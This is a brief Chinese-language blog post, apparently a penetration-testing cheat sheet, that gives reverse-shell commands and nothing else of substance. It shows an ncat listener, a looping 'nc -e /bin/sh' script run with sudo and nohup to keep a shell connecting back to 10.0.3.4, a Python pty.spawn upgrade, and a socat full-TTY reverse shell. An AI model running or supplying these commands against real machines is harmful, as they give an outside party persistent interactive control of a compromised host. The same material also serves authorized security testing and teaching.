服务端

1
ncat -lvnp 4444

被控端

1
2
3
echo 'while true; do nc -e /bin/sh 10.0.3.4 5001; done' > keep,sh
chmod a+x ./keep.sh
sudo nohup ./keep.sh &

提升到pty

1
python -c 'import pty; pty.spawn("/bin/bash")'

进一步提升可以使用tab,方向键,ctrl+c SEGINT等
服务端

1
socat file:`tty`,raw,echo=0 tcp-listen:4444

被控端

1
2
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
export TERM=xterm256-color

参考:https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

说些什么吧!

utterances